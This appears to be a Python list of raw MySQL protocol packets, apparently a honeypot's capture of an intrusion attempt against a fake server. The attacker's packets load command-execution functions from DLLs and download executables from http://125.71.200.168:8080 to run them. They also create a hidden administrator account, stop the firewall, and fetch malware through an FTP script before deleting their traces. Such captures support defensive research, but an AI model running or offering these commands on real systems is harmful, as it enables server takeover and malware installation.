stream = [('out', b'4\x00\x00\x00\x0a5.7.16\x00\x00\x00\x12gaaaaaaaa\x00,\xa2!\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00            \x00'),
('in', b'&\x00\x00\x01\x85\xa2\x03\x00\x00\x00\x00\x01\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00root\x00\x00'),
('out', b'\x07\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00'),
('in', b'6\x00\x00\x00\x03create function xpdl3 returns string soname \x27udf.dll\x27'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'9\x00\x00\x00\x03CREATE FUNCTION cmdshell RETURNS string SONAME \x27xsa.dll\x27'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b';\x00\x00\x00\x03CREATE FUNCTION downloader RETURNS string SONAME \x27xsa.dll\x27'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'F\x00\x00\x00\x03create function cmdshell returns string soname "lib_mysqludf_sys.dll"'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'H\x00\x00\x00\x03create function downloader returns string soname "lib_mysqludf_sys.dll"'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b';\x00\x00\x00\x03CREATE FUNCTION cmdshell RETURNS string SONAME \x27udf32.dll\x27'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b';\x00\x00\x00\x03CREATE FUNCTION cmdshell RETURNS string SONAME \x27udf33.dll\x27'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'=\x00\x00\x00\x03create function downloader returns string soname "udf32.dll"'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'=\x00\x00\x00\x03create function downloader returns string soname "udf33.dll"'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'9\x00\x00\x00\x03CREATE FUNCTION cmdshell RETURNS string SONAME \x27xsa.dll\x27'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b';\x00\x00\x00\x03CREATE FUNCTION downloader RETURNS string SONAME \x27xsa.dll\x27'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b';\x00\x00\x00\x03CREATE FUNCTION cmdshell RETURNS string SONAME \x27xijin.dll\x27'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'=\x00\x00\x00\x03CREATE FUNCTION downloader RETURNS string SONAME \x27xijin.dll\x27'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'<\x00\x00\x00\x03CREATE FUNCTION cmdshell RETURNS string SONAME \x27xijin1.dll\x27'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'>\x00\x00\x00\x03CREATE FUNCTION downloader RETURNS string SONAME \x27xijin1.dll\x27'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'6\x00\x00\x00\x03CREATE FUNCTION shell RETURNS string SONAME \x27udf.dll\x27'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'9\x00\x00\x00\x03CREATE FUNCTION cmdshelv RETURNS string SONAME \x27udf.dll\x27'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'F\x00\x00\x00\x03create function cmdshell returns string soname "lib_mysqludf_sys.dll"'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'H\x00\x00\x00\x03create function downloader returns string soname "lib_mysqludf_sys.dll"'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'F\x00\x00\x00\x03select downloader("http://125.71.200.168:8080/gy.exe","C:\x5c\x5cDNS1.exe")'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'F\x00\x00\x00\x03select xpdl3("http://125.71.200.168:8080/svchost.exe","C:\x5c\x5cDNS2.exe")'),
('out', b'\x07\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00'),
('in', b' \x00\x00\x00\x03select cmdshell("C:\x5c\x5cDNS1.exe")'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'#\x00\x00\x00\x03select shell("cmd","C:\x5c\x5cDNS2.exe")'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'/\x00\x00\x00\x03select cmdshell("C:\x5c\x5cDNS1.exe & c:\x5c\x5cDNS2.exe")'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'p\x00\x00\x00\x03select cmdshell("cmd.exe cmd/c net user admins$ admin@$101155 /add&net localgroup administrators admins$ /add")'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'p\x00\x00\x00\x03select cmdshelv(\x27cmd.exe cmd/c net user admins$ admin@$101155 /add&net localgroup administrators admins$ /add\x27)'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'm\x00\x00\x00\x03select shell("cmd.exe cmd/c net user admins$ admin@$101155 /add&net localgroup administrators admins$ /add")'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'\x09\x01\x00\x00\x03select cmdshell("cmd.exe cmd/c net stop sharedaccess&echo open 125.71.200.168>>ge.dat&echo 123>>ge.dat&echo 123>>ge.dat&echo bin>>ge.dat&echo get gy.exe>>ge.dat&echo get gy.exe>>ge.dat&echo bye>>ge.dat&ftp -s:ge.dat&gy.exe&gy.exe&del ge.dat&del gy.exe&del gy.exe")'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'.\x00\x00\x00\x03Drop FUNCTION IF EXISTS lib_mysqludf_sys_info'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b' \x00\x00\x00\x03Drop FUNCTION IF EXISTS sys_get'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b' \x00\x00\x00\x03Drop FUNCTION IF EXISTS sys_set'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'!\x00\x00\x00\x03Drop FUNCTION IF EXISTS sys_exec'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'!\x00\x00\x00\x03Drop FUNCTION IF EXISTS sys_eval'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'!\x00\x00\x00\x03Drop FUNCTION IF EXISTS cmdshell'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'#\x00\x00\x00\x03Drop FUNCTION IF EXISTS downloader'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'\x1e\x00\x00\x00\x03Drop FUNCTION IF EXISTS shell'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'\x05\x00\x00\x00\x03exit'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'\x01\x00\x00\x00\x01')]